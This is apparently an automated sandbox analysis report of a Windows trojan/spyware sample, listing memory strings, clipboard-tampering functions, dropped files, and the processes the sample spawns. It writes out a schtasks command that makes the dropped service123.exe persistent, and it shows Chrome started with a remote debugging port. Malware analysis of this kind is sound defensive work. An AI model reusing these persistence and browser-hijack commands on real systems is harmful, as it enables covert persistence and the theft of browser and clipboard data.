Source: chrome.exe, 00000004.00000002.2054314824.000056DC00744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000004.00000002.2062560280.000072B402530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2026909652.000072B4028BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062734249.000072B402570000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2063274171.000072B4026F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2067601990.000072B4030DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064428720.000072B402958000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063136870.000072B4026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065161054.000072B402B6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064488477.000072B402974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000004.00000002.2063816677.000072B402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063136870.000072B4026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064488477.000072B402974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000004.00000002.2063816677.000072B402878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 00000004.00000002.2067848842.000072B4031C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063136870.000072B4026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064488477.000072B402974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000004.00000002.2065307576.000072B402BE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065161054.000072B402B9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000004.00000002.2064184085.000072B4028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065629574.000072B402CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066986149.000072B402F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065072270.000072B402B30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2036248725.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2067012856.000072B402FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066986149.000072B402F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065629574.000072B402CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000004.00000002.2062236624.000072B4024E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2036248725.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2067012856.000072B402FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066986149.000072B402F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000004.00000002.2062236624.000072B4024E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066986149.000072B402F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2036248725.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066986149.000072B402F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2036248725.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2067012856.000072B402FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2067063909.000072B402FAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000002.2066824656.000072B402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065629574.000072B402CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2036248725.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066986149.000072B402F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000002.2065307576.000072B402BE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065161054.000072B402B9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000003.2042779100.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2068289008.000072B40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042898821.000072B4032F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2065307576.000072B402BE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065161054.000072B402B9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2061094058.000072B40228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2061272111.000072B4022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2066372302.000072B402E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064606770.000072B4029C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064577012.000072B4029A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2066372302.000072B402E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064606770.000072B4029C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064577012.000072B4029A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2065385255.000072B402C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2063676457.000072B40280C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2066165584.000072B402E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2066165584.000072B402E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2062999108.000072B402644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2059971722.000072B40221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000003.2037509457.000072B403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2037404201.000072B402EBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2064693956.000072B402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2066165584.000072B402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066372302.000072B402E84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000004.00000002.2066372302.000072B402E84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2me/
Source: chrome.exe, 00000004.00000002.2066165584.000072B402E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2torr
Source: chrome.exe, 00000004.00000002.2068157261.000072B403354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2067516017.000072B4030AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065099145.000072B402B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064782450.000072B402A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2065099145.000072B402B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064782450.000072B402A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2067403455.000072B403074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2063274171.000072B4026F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063532183.000072B4027A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2064428720.000072B402958000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icodexed
Source: chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoings
Source: chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icowait).
Source: chrome.exe, 00000004.00000003.2042898821.000072B4032F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2065506944.000072B402C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2059971722.000072B40221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063565615.000072B4027C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2063045895.000072B402684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA9BA6 CloseHandle,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 8_2_6BDA9BA6
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6BDA9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6BDA9C22
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA9BA6 CloseHandle,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 8_2_6BDA9BA6

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F51B0 8_2_004F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F3E20 8_2_004F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE0AC0 8_2_6BDE0AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA0FC0 8_2_6BDA0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BD9EE50 8_2_6BD9EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BD9CD00 8_2_6BD9CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD2CCE 8_2_6BDD2CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDC2360 8_2_6BDC2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDB2210 8_2_6BDB2210
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD2090 8_2_6BDD2090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE0060 8_2_6BDE0060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD07D0 8_2_6BDD07D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDC87C0 8_2_6BDC87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD46E0 8_2_6BDD46E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA44F0 8_2_6BDA44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDDDBEE 8_2_6BDDDBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD7A20 8_2_6BDD7A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDC98F0 8_2_6BDC98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA5880 8_2_6BDA5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE63D00 8_2_6BE63D00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDEDC70 8_2_6BDEDC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE55180 8_2_6BE55180
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDA70C0 8_2_6BDA70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BD93000 8_2_6BD93000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDBF760 8_2_6BDBF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDDF610 8_2_6BDDF610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDE1510 8_2_6BDE1510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BDD140E 8_2_6BDD140E
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll C11792DFC9F60EE410C105F2E44E32019AA128F6E1714DEFB1812956DAF3113C
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE5ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE63B20 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE636E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE65A70 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE65980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE63560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BE63820 appears 36 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6432 -s 1824
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: zxydtulm ZLIB complexity 0.9943812517990789
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6432
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2063816677.000072B402894000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2316,i,2533003572395420932,2322176061652296180,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6432 -s 1824
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2316,i,2533003572395420932,2322176061652296180,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
